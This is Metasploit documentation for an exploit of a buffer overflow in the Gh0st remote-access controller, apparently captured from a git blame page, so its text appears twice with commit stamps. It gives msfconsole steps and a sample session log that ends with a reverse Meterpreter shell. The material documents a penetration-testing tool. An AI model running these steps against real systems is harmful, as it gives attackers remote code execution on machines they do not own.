documentation/modules/exploit/windows/misc/gh0st.md

## Vulnerable Application

  This module exploits a buffer overflow in the Gh0st Controller when handling a drive list as received by a victim.
  This vulnerability can allow remote code execution in the context of the user who ran it.

  A vulnerable version of the software is available here: [gh0st 3.6](https://github.com/rapid7/metasploit-framework/files/1243297/0efd83a87d2f5359fae051517fdf4eed8972883507fbd3b5145c3757f085d14c.zip)

## Verification Steps

  1. Run the application
  2. Start msfconsole
  3. Do: `use exploit/windows/misc/gh0st`
  4. Do: `set rhost [ip]`
  5. Do: `exploit`
  6. Get a shell

## Options

  **MAGIC**

  This is the 5 character magic used by the server.  The default is `Gh0st`

## Scenarios

### Windows XP SP3 with gh0st 3.6

```
msf > use exploit/windows/misc/gh0st 
msf exploit(gh0st) > set rhost 192.168.2.108
rhost => 192.168.2.108
msf exploit(gh0st) > exploit

[*] Started reverse TCP handler on 1.2.3.4:4444 
[*] 1.2.3.1:80 - Trying target Gh0st Beta 3.6
[*] 1.2.3.1.108:80 - Spraying heap...
[*] 1.2.3.1:80 - Trying command 103...
[*] Sending stage (956991 bytes) to 1.2.3.1
[*] Meterpreter session 1 opened (1.2.3.4:4444 -> 1.2.3.1:1303) at 2017-08-26 16:53:58 -0400
[*] 1.2.3.1:80 - Server closed connection

meterpreter >
```
modules cleanup and add docs 2017-09-04 20:57:23 -04:00			`## Vulnerable Application`

			`This module exploits a buffer overflow in the Gh0st Controller when handling a drive list as received by a victim.`
			`This vulnerability can allow remote code execution in the context of the user who ran it.`
catch false positive spaces at eol from code indent 2020-01-28 14:28:18 -05:00
modules cleanup and add docs 2017-09-04 20:57:23 -04:00			`A vulnerable version of the software is available here: [gh0st 3.6](https://github.com/rapid7/metasploit-framework/files/1243297/0efd83a87d2f5359fae051517fdf4eed8972883507fbd3b5145c3757f085d14c.zip)`

			`## Verification Steps`

			`1. Run the application`
			`2. Start msfconsole`
			3. Do: `use exploit/windows/misc/gh0st`
			4. Do: `set rhost [ip]`
			5. Do: `exploit`
			`6. Get a shell`

			`## Options`

			`MAGIC`
catch false positive spaces at eol from code indent 2020-01-28 14:28:18 -05:00
modules cleanup and add docs 2017-09-04 20:57:23 -04:00			This is the 5 character magic used by the server. The default is `Gh0st`

			`## Scenarios`

			`### Windows XP SP3 with gh0st 3.6`

			```
			`msf > use exploit/windows/misc/gh0st`
			`msf exploit(gh0st) > set rhost 192.168.2.108`
			`rhost => 192.168.2.108`
			`msf exploit(gh0st) > exploit`

			`[*] Started reverse TCP handler on 1.2.3.4:4444`
			`[*] 1.2.3.1:80 - Trying target Gh0st Beta 3.6`
			`[*] 1.2.3.1.108:80 - Spraying heap...`
			`[*] 1.2.3.1:80 - Trying command 103...`
			`[*] Sending stage (956991 bytes) to 1.2.3.1`
			`[*] Meterpreter session 1 opened (1.2.3.4:4444 -> 1.2.3.1:1303) at 2017-08-26 16:53:58 -0400`
			`[*] 1.2.3.1:80 - Server closed connection`

			`meterpreter >`
			```